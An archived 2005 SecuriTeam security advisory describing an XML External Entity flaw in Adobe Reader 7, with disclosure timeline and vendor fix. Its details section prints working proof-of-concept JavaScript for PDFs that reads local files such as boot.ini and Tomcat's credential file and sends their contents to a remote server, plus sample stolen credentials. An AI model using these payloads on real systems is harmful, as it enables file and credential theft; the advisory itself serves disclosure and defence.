Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[NEWS] Adobe Reader 7 XML External Entity (XXE) Attack

from [SecuriTeam] Network Security [Permanent Link]
Subject: [NEWS] Adobe Reader 7 XML External Entity (XXE) Attack
Date: 19 Jun 2005 18:41:25 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Adobe Reader 7 XML External Entity (XXE) Attack
------------------------------------------------------------------------


SUMMARY

Recent versions of Adobe Reader (previously known as Acrobat Reader) are 
vulnerable to XML External Entity (XXE) Attacks. By including a JavaScript 
in a PDF file, and have this JavaScript parse an embedded XML document 
with a reference to an external entity, it is possible to read certain 
types of textual files on the local computer, and have them sent to a 
remote attacker.

DETAILS

Vulnerable Systems:
 * Adobe Reader 7.01 on Microsoft Windows
 * Adobe Reader 7

Immune Systems:
 * Adobe Reader 7.02 on Microsoft Windows

Recent versions of Adobe Reader allow inclusion of JavaScript. As well as 
JavaScript users may embed XML documents inside a PDF. These XML documents 
can reference External Entities through URIs, and most XML parsers, 
including the one used in Adobe Reader, will allow access to any URI for 
External Entities, including files, unless they are specifically told to 
do otherwise.

To Sverre's knowledge, the general "XML External Entity Attack" was first 
described by Gregory Steuck in 2002 ( 
<http://www.securiteam.com/securitynews/6D0100A5PU.html> 
http://www.securiteam.com/securitynews/6D0100A5PU.html). The following 
example XML document will make the XML parser read c:\boot.ini and expand 
it into the content of the foo tag:

< ?xml version="1.0" encoding="ISO-8859-1"?>
< !DOCTYPE foo [
   < !ELEMENT foo ANY>
   < !ENTITY xxe SYSTEM "c:/boot.ini">
]>
< foo>&xxe;</foo>

Note how the ENTITY definition creates the xxe entity, and how this entity 
is referenced in the final line. The textual content of the foo tag will 
be the content of c:\boot.ini and a JavaScript accessing the DOM will be 
able to extract it.

Note: The attack is limited to files containing text that the XML parser 
will allow at the place the External Entity is referenced. Files 
containing non-printable characters, and files with randomly located less 
than signs or ampersands, will not be include-able. This restriction 
greatly limits the number of possible target files.

The following Adobe Reader-targeted JavaScript contains the above XML, 
instructs the Adobe Reader XML parser to parse it, and passes the expanded 
External Entity (i.e. the content of c:\boot.ini) to a remote web server 
using the system web browser:

var xml="< ?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>< !DOCTYPE foo [ 
< !ELEMENT foo ANY> "
 + "< !ENTITY xxe SYSTEM \"c:/boot.ini\"> ]>< foo>&xxe;</foo>";
var xdoc = XMLData.parse(xml, false);
app.launchURL("http://shh.thathost.com/secdemo/show.php?";
 + "head=Your+boot.ini&text="
 + escape(xdoc.foo.value));

The remote web server URL points to a script that just displays whatever 
is sent to it. (Please realize that even if the content of c:\boot.ini is 
displayed in the local web browser, it has taken a trip to the remote web 
server before being displayed locally.):

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP 
Professional" /fastdetect /NoExecute=OptIn

One can clearly see that the web server got a copy of c:\boot.ini from the 
local computer. As stated above, the XML parser is rather picky when it 
comes to the contents of the included file. But it has no problems if the 
file contains XML, which an increasing number of files appear to do these 
days.

New example:
Apache Tomcat stores user names and (clear-text, shame on them!) passwords 
in a file called tomcat-users.xml. The following PDF-included JavaScript 
looks for this file in several plausible locations, and if found, extracts 
all interesting attributes from the included XML, and passes them on to 
the above mentioned web site:

function load(uri) {
 try {
  var xml="<?xml version=\"1.0\"?>< !DOCTYPE foo [ < !ELEMENT foo ANY> "
     + "< !ENTITY xxe SYSTEM "
     + "\"" + uri + "\"> ]>< foo>&xxe;</foo>";
   return XMLData.parse(xml, false);
 } catch (e) {
  console.println(e);
  return null;
 }
}

function attempt(uri) {
 var xdoc = load(uri);
 if (xdoc == null)
  return false;
 try {
  var users = XMLData.applyXPath(xdoc, 
"//foo/tomcat-users/user/attribute::*");
  var s = "match: " + uri + "\n"
  for (var q = 0; q < users.length; q++)
    s += users.item(q).name + "=" + users.item(q).value + "  ";
     app.launchURL("http://shh.thathost.com/secdemo/show.php?";
 + "head=tomcat-users&text=" + escape(s));
   return true;
  } catch (e) {
   console.println(e);
  }
  return false;
}

uris = [
 "file:///C:/PROGRA~1/APACHE~1/TOMCAT~1.5/conf/tomcat-users.xml",
 "file:///C:/PROGRA~1/APACHE~1/TOMCAT~1.4/conf/tomcat-users.xml",
 "file:///C:/PROGRA~1/APACHE~2/TOMCAT~1.5/conf/tomcat-users.xml",
 "file:///C:/PROGRA~1/APACHE~2/TOMCAT~1.4/conf/tomcat-users.xml"
];

for (var q = 0; q < uris.length; q++)
 if (attempt(uris[q]))
  break;

When executed on Windows XP, which happens to have Tomcat 5.5 installed in 
the default location, the web server script displays the following:

match: file:///C:/PROGRA~1/APACHE~2/TOMCAT~1.5/conf/tomcat-users.xml
name=admin password=foobar roles=admin,manager name=tomcat password=tomcat 
roles=tomcat name=role1 password=tomcat roles=role1 name=both 
password=tomcat roles=tomcat,role1

Vendor Status:
The vendor has released an update in 2005-06-15.

Disclosure Timeline:
2005-04-15: Adobe notified
2005-04-20: Reply from Adobe's Product Security Incident Response Team 
(PSIRT) that they are looking into it
2005-05-09: Sverre H. Huseby sent an E-mail to Adobe's PSIRT asking for 
the current status
2005-05-10: E-mail from Adobe that they're working on a fix
2005-06-15: Adobe releases the fixed version 7.0.2 for Windows


ADDITIONAL INFORMATION

The information has been provided by  <mailto:shh@thathost.com> Sverre H. 
Huseby.
The original article can be found at:  
<http://shh.thathost.com/secadv/adobexxe/> 
http://shh.thathost.com/secadv/adobexxe/
The vendor advisory can be found at:  
<http://www.adobe.com/support/techdocs/331710.html> 
http://www.adobe.com/support/techdocs/331710.html
Advisory on XML External Entity (XXE) Attack can be found at:  
<http://www.securiteam.com/securitynews/6D0100A5PU.html> 
http://www.securiteam.com/securitynews/6D0100A5PU.html



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [NEWS] Adobe Reader 7 XML External Entity (XXE) Attack, SecuriTeam <=
Previous by Date:  [EXPL] Claroline E-Learning Application Remote SQL Injection, SecuriTeam
Next by Date:  [UNIX] ViRobot Remote Code Inclusion, SecuriTeam
Previous by Thread:  [EXPL] Claroline E-Learning Application Remote SQL Injection, SecuriTeam
Next by Thread:  [UNIX] ViRobot Remote Code Inclusion, SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]